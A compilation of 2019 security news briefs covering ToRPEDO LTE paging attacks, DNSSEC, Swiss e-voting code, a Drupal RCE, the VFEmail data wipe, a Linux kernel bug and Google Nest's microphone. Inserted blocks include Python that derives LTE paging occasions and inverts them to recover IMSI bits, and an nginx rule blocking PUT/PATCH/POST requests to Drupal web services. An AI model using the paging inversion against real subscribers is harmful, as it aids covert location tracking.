Co-author Syed Rafiul Hussain told TechCrunch, “Any person with a little knowledge of cellular paging protocols can carry out this attack.” “According to Hussain, all four major U.S. operators — AT&T, Verizon (which owns TechCrunch), Sprint and T-Mobile — are affected by Torpedo, and the attacks can be carried out with radio equipment costing as little as $200”, TechCrunch reports. Hussain said the flaws were reported to the GSMA, the industry body that represents mobile operators. GSMA recognized the flaws, but a spokesperson was unable to comment when reached, and it is not known when the flaws will be fixed. One user wrote on Hacker News, “Most people consider the fact that your handset will readily talk to any base station that's on the air to be a feature. Try to imagine how things would work if you had to authenticate and authorize every station on the network. It's true that anyone who gets on the air and speaks the air protocol can screw with your phone. Those people are also violating multiple laws and regulations in the course of doing so.” To know more about these flaws in detail, head over to the complete research paper.
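The paging-occasion weakness ToRPEDO builds on can be seen by working through the LTE paging rules (3GPP TS 36.304, section 7.1) in code. The following is an added example written for this page, not the authors' attack tooling: it computes a UE's paging frame and subframe from its IMSI, then inverts that computation the way ToRPEDO's observer does, listing every value of IMSI mod 1024 consistent with an observed paging occasion. The IMSI is a made-up number, the DRX cycle and nB values are chosen for illustration, and FDD subframe patterns are assumed.

```python
"""Added example (not the paper's code): LTE paging occasion from 3GPP TS 36.304
section 7.1, and the inversion an observer uses to learn bits of the IMSI."""

# FDD paging subframe patterns (TS 36.304 Table 7.1-1), indexed by i_s.
FDD_SUBFRAME_PATTERNS = {1: (9,), 2: (4, 9), 4: (0, 4, 5, 9)}


def paging_parameters(drx_cycle, nb):
    """N = min(T, nB) and Ns = max(1, nB / T) for DRX cycle T (radio frames) and density nB."""
    if drx_cycle not in (32, 64, 128, 256):
        raise ValueError("T must be 32, 64, 128 or 256 radio frames")
    allowed = {4 * drx_cycle, 2 * drx_cycle, drx_cycle} | {drx_cycle // d for d in (2, 4, 8, 16, 32)}
    if nb not in allowed:
        raise ValueError("nB must be 4T, 2T, T, T/2, ... T/32")
    n = min(drx_cycle, nb)
    ns = max(1, nb // drx_cycle)
    return n, ns


def paging_occasion(imsi, drx_cycle=128, nb=128):
    """(paging-frame offset within the DRX cycle, subframe) for a UE identified by IMSI.

    PF satisfies SFN mod T = (T div N) * (UE_ID mod N), with UE_ID = IMSI mod 1024;
    i_s = floor(UE_ID / N) mod Ns selects the subframe within that frame.
    """
    n, ns = paging_parameters(drx_cycle, nb)
    ue_id = int(imsi) % 1024
    pf_offset = (drx_cycle // n) * (ue_id % n)
    i_s = (ue_id // n) % ns
    return pf_offset, FDD_SUBFRAME_PATTERNS[ns][i_s]


def candidate_ue_ids(pf_offset, subframe, drx_cycle=128, nb=128):
    """ToRPEDO's inversion: every UE_ID (IMSI mod 1024) that is paged at this occasion."""
    return [u for u in range(1024)
            if paging_occasion(u, drx_cycle, nb) == (pf_offset, subframe)]


def leaked_imsi_bits(drx_cycle=128, nb=128):
    """How many bits of IMSI mod 1024 one observed occasion pins down: log2(1024 / #candidates)."""
    pf_offset, subframe = paging_occasion(0, drx_cycle, nb)
    return (1024 // len(candidate_ue_ids(pf_offset, subframe, drx_cycle, nb))).bit_length() - 1


if __name__ == "__main__":
    IMSI = 310260123456789  # constructed, not a real subscriber
    for t, nb in ((128, 128), (128, 256), (128, 64)):
        pf, sf = paging_occasion(IMSI, t, nb)
        cands = candidate_ue_ids(pf, sf, t, nb)
        print("T=%d nB=%d: paged at PF offset %d subframe %d; %d candidate UE_IDs, %d IMSI bits leaked"
              % (t, nb, pf, sf, len(cands), leaked_imsi_bits(t, nb)))
```

An observer who triggers repeated pages (the paper's silent calls) and watches which frame and subframe carry them learns UE_ID mod N directly, which for the common T = 128, nB = T configuration is 7 bits of the IMSI; larger nB adds subframe bits, and smaller nB removes them. Those bits are what the IMSI-Cracking brute force above starts from.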

ICANN calls for DNSSEC across unsecured domain names amidst increasing malicious activity in the DNS infrastructure

Amrata Joshi
25 Feb 2019
3 min read
Last week, the Internet Corporation for Assigned Names and Numbers (ICANN) called for the full deployment of the Domain Name System Security Extensions (DNSSEC) across all unsecured domain names. ICANN took this step because of increasing reports of malicious activity targeting the DNS infrastructure. According to ICANN, there is an ongoing and significant risk to key parts of the Domain Name System (DNS) infrastructure. The DNS, which translates between domain names and numerical internet addresses, has been the target of attacks using a range of methods.

https://twitter.com/ICANN/status/1099070857119391745?ref_src=twsrc%5Egoogle%7Ctwcamp%5Eserp%7Ctwgr%5Etweet

Last month, security company FireEye revealed that hackers associated with Iran were hijacking DNS records, rerouting users from a legitimate web address to a malicious server in order to steal passwords. This “DNSpionage” campaign targeted governments in the United Arab Emirates and Lebanon. The Department of Homeland Security's Cybersecurity and Infrastructure Security Agency had warned that U.S. agencies were also under attack; in its first emergency order, issued amid a government shutdown, the agency directed federal agencies to take action against DNS tampering. David Conrad, ICANN's chief technology officer, told the AFP news agency that the hackers are “going after the Internet infrastructure itself.”

ICANN is urging domain owners to deploy DNSSEC, which extends DNS with cryptographic signatures over DNS data, making records harder to spoof or manipulate. Some of the attacks replace the addresses of the intended servers with the addresses of machines controlled by the attackers; this kind of DNS tampering only works when DNSSEC is not in use. ICANN also reaffirmed its commitment to collaborative efforts to ensure the security, stability, and resiliency of the internet's global identifier systems.

This month, ICANN offered a checklist of recommended security precautions for members of the domain name industry (registries, registrars, resellers, and others) so they can proactively protect their systems. ICANN aims to ensure that internet users reach their intended online destination by preventing “man in the middle” attacks in which a user is unknowingly redirected to a potentially malicious site.

Some users who have previously been victims of DNS hijacking think this move won't help them. One user commented on Hacker News, “This is nonsense, and possibly crossing the border from ignorant nonsense to malicious nonsense.” Another user said, “There is in fact very little evidence that we "need" the authentication provided by DNSSEC.” Few others see it as a good solution; one comment reads, “DNSSEC is quite famously a solution in search of a problem.”

To know more about this news, check out ICANN's official post.

Switzerland’s e-voting system source code leaked ahead of its bug bounty program; slammed for being ‘poorly constructed’

Savia Lobo
22 Feb 2019
4 min read
Last week, the source code of Swiss Post's recently launched online voting system was leaked. Experts who examined the code reported that the system is poorly designed, which makes it difficult both to audit the code for security and to configure it to operate securely. Swiss Post, Switzerland's national postal service, also launched a fully verifiable system and a bug bounty program this month to test the system's resilience to attacks. According to a Motherboard report, “critics are already expressing concern about the system’s design and about the transparency around the public test.”

Nathalie Dérobert, a spokeswoman for Swiss Post, said the public intrusion test is not meant to be an audit of the code “or to prove the security of the Swiss Post online voting system.” Instead, it is meant to help inform the developers about improvements they need to make. In an email, Dérobert wrote, “Security is a process and even if the source code passed numerous previous security audits, we expected criticism and even outright negative comments. After all, that is the whole point of publishing the source code: we want a frank response and an honest discussion about the merits and shortcomings of our work… [W]e are determined to take up the negative comments, discuss them with our developing partner Scytl and to get in touch with the people where we see a benefit.”

As for the public test of the new online system, more than 2,000 people have registered. The test will take place from February 25 to March 24. Under the rules, the bug bounty program will pay 20,000 Swiss francs to anyone who can manipulate votes in the mock election, or 30,000 to 50,000 francs if they manage to manipulate votes without being detected. Swiss Post is making the source code available to participants; however, the code was not supposed to be open to just anyone to examine.

Swiss Post responded to the publication of the code by saying the source code was not leaked, as it was already available to anyone who wanted to see it, provided they registered with Swiss Post. Swiss Post also wrote that there is no NDA or confidentiality agreement around publishing information about the source code or citing parts of it, but the statement said nothing about the Scytl technical documents themselves or the architecture and protocol information they contain.

Cryptography experts who examined the code said: “the system is a poorly constructed and convoluted maze that makes it difficult to follow what’s going on and effectively evaluate whether the cryptography and other security measures deployed in the system are done properly.” Sarah Jamie Lewis, a former security engineer for Amazon and a former computer scientist for England's GCHQ intelligence agency, said, “Most of the system is split across hundreds of different files, each configured at various levels. I’m used to dealing with Java code that runs across different packages and different teams, and this code somewhat defeats even my understanding.” Lewis said that the system uses cryptographic techniques that are fairly new to the field and that have to be implemented in very specific ways to make the system auditable, but the design the programmers chose thwarts this. “Someone could wire the thing in the wrong place and suddenly the system is compromised. And when you’re talking about code that is supposed to be protecting a national election, that is not a statement someone should be able to make”, Lewis added.

The voting system was developed by Swiss Post and the Barcelona-based company Scytl, which was formed by a group of academics who spun it off from their research work at the Universidad Autónoma de Barcelona (Autonomous University of Barcelona) in 2001. “Local cantons, or states, in Switzerland are the ones who administer elections and would be responsible for the configuration. Scytl claims the system uses end-to-end encryption that only the Swiss Electoral Board would be able to decrypt. But there are reasons to be concerned about such claims”, Motherboard reports.

Matthew Green, a noted cryptographer who teaches cryptography at Johns Hopkins University, said that the system is highly complex and “at this point, I think the only appropriate way to evaluate it is through a professional evaluation by someone trained in this sort of advanced cryptography. And even then I’d be concerned, given the stakes.”

To know more about this news, head over to Motherboard's complete coverage.

Drupal releases security advisory for ‘serious’ Remote Code Execution vulnerability

Melisha Dsouza
22 Feb 2019
2 min read
Drupal has released a security advisory for a highly critical remote code execution vulnerability (CVE-2019-6340) in its software. Samuel Mortenson, a member of the Drupal Security Team, reports that arbitrary PHP code execution is possible because some field types do not properly sanitize data from non-form sources. Drupal issued the warning a day before Wednesday's patch release.

According to Drupal's blog, a site is affected either if it has the Drupal 8 core RESTful Web Services (rest) module enabled and allows PATCH or POST requests, or if it has another web services module enabled, for instance JSON:API in Drupal 8, or Services or RESTful Web Services in Drupal 7.

To address this vulnerability, Drupal has released security updates for contributed modules for Drupal 7 and Drupal 8. Drupal has also released Drupal 8.6.10 and Drupal 8.5.11; there is no core update for Drupal 7. The team has also advised users to install any available security updates for contributed projects after updating Drupal core. The blog further states that, to mitigate the vulnerability immediately, users can disable all web services modules, or configure their web server(s) to not allow PUT/PATCH/POST requests to web services resources.

According to ZDNet, Drupal is the third most popular CMS for website publishing and accounts for about three percent of the world's billion-plus websites. Attackers could exploit this vulnerability to hijack a Drupal site and take control of the web server and all the websites it hosts.

To know more about this announcement, visit Drupal's blog.
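As an added illustration of the web-server mitigation the advisory names (this is not configuration from Drupal or the advisory), the following nginx fragment rejects PUT, PATCH and POST requests aimed at web services resources while leaving the rest of the site, including ordinary form submissions, untouched. It assumes that REST-module requests carry Drupal 8's `_format` query parameter and that JSON:API is served under its default `/jsonapi` prefix; both patterns and the placeholder paths need to be adjusted to the site in question.

```nginx
# Added example, not from Drupal or the advisory: stop-gap mitigation for
# CVE-2019-6340 on an nginx-fronted Drupal 8 site, implementing the advisory's
# "do not allow PUT/PATCH/POST requests to web services resources" option.
# Assumed (verify against your site): REST requests use the `_format` query
# parameter and JSON:API is served under /jsonapi.

# 1 for the write methods the advisory names, 0 for everything else.
map $request_method $drupal_ws_write {
    default 0;
    PUT     1;
    PATCH   1;
    POST    1;
}

# 1 when the request addresses a web services resource. $uri carries no query
# string, so "$uri$is_args$args" lets one regex cover both path and query.
map "$uri$is_args$args" $drupal_ws_target {
    default            0;
    "~^/jsonapi(/|$)"  1;
    "~[?&]_format="    1;
}

server {
    listen      80;
    server_name example.invalid;      # placeholder
    root        /var/www/drupal;      # placeholder

    # Server-level check so it applies before any location (including the
    # PHP handler) is selected. Only the combination "write method AND web
    # services resource" is refused; normal POSTs to login or comment forms
    # on non-REST paths continue to work.
    if ($drupal_ws_write$drupal_ws_target = "11") {
        return 405;
    }

    location / {
        try_files $uri /index.php?$query_string;
    }

    location ~ \.php$ {
        include       fastcgi_params;
        fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;
        fastcgi_pass  unix:/run/php-fpm.sock;   # placeholder socket path
    }
}
```

This only narrows the reachable surface; the fix the advisory relies on is updating Drupal core and the affected contributed modules, after which the block can be removed.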

VFEMail suffers complete data wipe out!

Savia Lobo
22 Feb 2019
3 min read
On Monday, 11 February, the Wisconsin-based email provider VFEmail was attacked by an intruder who destroyed all of the company's primary and backup data in the United States. The first signs of the attack appeared that day, when users began tweeting at the company's Twitter account that they were no longer receiving messages. According to Krebs on Security, “VFEmail tweeted that it had caught a hacker in the act of formatting one of the company’s mail servers in the Netherlands.” A further tweet stated, “nl101 is up, but no incoming email. I fear all US-based data may be lost.”

Following this, VFEmail's founder, Rick Romero, tweeted, “Yes, @VFEmail is effectively gone. It will likely not return. I never thought anyone would care about my labor of love so much that they'd want to completely and thoroughly destroy it.”

https://twitter.com/Havokmon/status/1095297448082317312

Another tweet on the VFEmail account said that the attacker formatted all disks on every server, and that VFEmail has lost every VM and all files hosted on the available servers. “NL was 100% hosted with a vastly smaller dataset. NL backups by the provider were intact, and service should be up there.”

https://twitter.com/VFEmail/status/1095038701665746945

Romero has posted updates on the company's website, one of which reads, “We have suffered catastrophic destruction at the hands of a hacker, last seen as aktv@94.155.49.9”. He also wrote, “At this time I am unsure of the status of existing mail for US users. If you have your own email client, DO NOT TRY TO MAKE IT WORK. If you reconnect your client to your new mailbox, all your local mail will be lost.”

John Senchak, a longtime VFEmail user from Florida, told Krebs on Security that the attack completely deleted his inbox at the company; some 60,000 emails sent and received over more than a decade were lost. He also said, “It looked like the IP was a Bulgarian hosting company. So I’m assuming it was just a virtual machine they were using to launch the attack from. There definitely was something that somebody didn’t want found. Or, I really pissed someone off. That’s always possible.”

The company has assured users that it is working to recover the data as soon as possible. To know more about this news and stay updated, read VFEmail's complete Twitter thread.

Linux use-after-free vulnerability found in Linux 2.6 through 4.20.11

Savia Lobo
21 Feb 2019
2 min read
Last week, a Huawei engineer reported a vulnerability present from the early Linux 2.6 kernels through version 4.20.11. The Kernel Address Sanitizer (KASAN), which detects dynamic memory errors in Linux kernel code, was used to uncover the use-after-free bug, which has existed since early Linux versions. The use-after-free was found in the networking subsystem's sockfs code and could lead to arbitrary code execution.

KASAN (along with the other sanitizers) has already proven valuable in spotting coding mistakes, ideally before they are exploited in the real world, and it has added another feather to its cap with the discovery of CVE-2019-8912. The vulnerability has a CVSS v3.0 score of 9.8 (Critical). A fix has already been released; it should reach Linux distributions within a couple of days and will probably be backported to all supported Linux kernel versions.

According to a user on Hacker News, “there may not actually be a proof-of-concept exploit yet, beyond a reproducer causing a KASAN splat. When people request a CVE for a use-after-free bug they usually just assume that code execution may be possible.”

To know more about this vulnerability, visit the NVD website.

Google’s home security system, Nest Secure’s had a hidden microphone; Google says it was an “error”

Melisha Dsouza
21 Feb 2019
2 min read
Earlier this month, Google upgraded its home security and alarm system, Nest Secure, to work with Google Assistant. This means that Nest Secure customers can perform tasks such as asking Google about the weather. The device shipped with a microphone for this purpose, but the microphone was not mentioned in the device's published specifications.

On Tuesday, a Google spokesperson told Business Insider that the omission was an “error” on the company's part: “The on-device microphone was never intended to be a secret and should have been listed in the tech specs.” The Nest team added that the microphone has “never been on” and is activated only when users specifically enable the option. As to why the microphone was installed in the devices at all, the team said it was to support future features “such as the ability to detect broken glass.” Before sending an official statement to Business Insider, the Nest team had replied to a similar concern from a user on Twitter in early February.

https://twitter.com/treaseye/status/1092507172255289344

Scott Galloway, professor of marketing at the New York University Stern School of Business, expressed strong views about the news on Twitter:

https://twitter.com/profgalloway/status/1098228685155508224

Users have even accused Google of “pretending the mistake happened” and slammed Google over the error.

https://twitter.com/tshisler/status/1098231070275686400

https://twitter.com/JoshConstine/status/1098086028353720320

Apart from Google, there have been multiple cases in the past of Amazon Alexa and Google Home listening to people's conversations and thus invading their privacy. Earlier this year, a family in Portland discovered that its Alexa-powered Echo device had recorded a private conversation and sent it to a random person in their contacts list.

Google's so-called “error” could lead to a drop in the number of customers buying its home security system, as well as a drop in the trust users place in Google's products. It is high time Google took the security standards and integrity of its products seriously.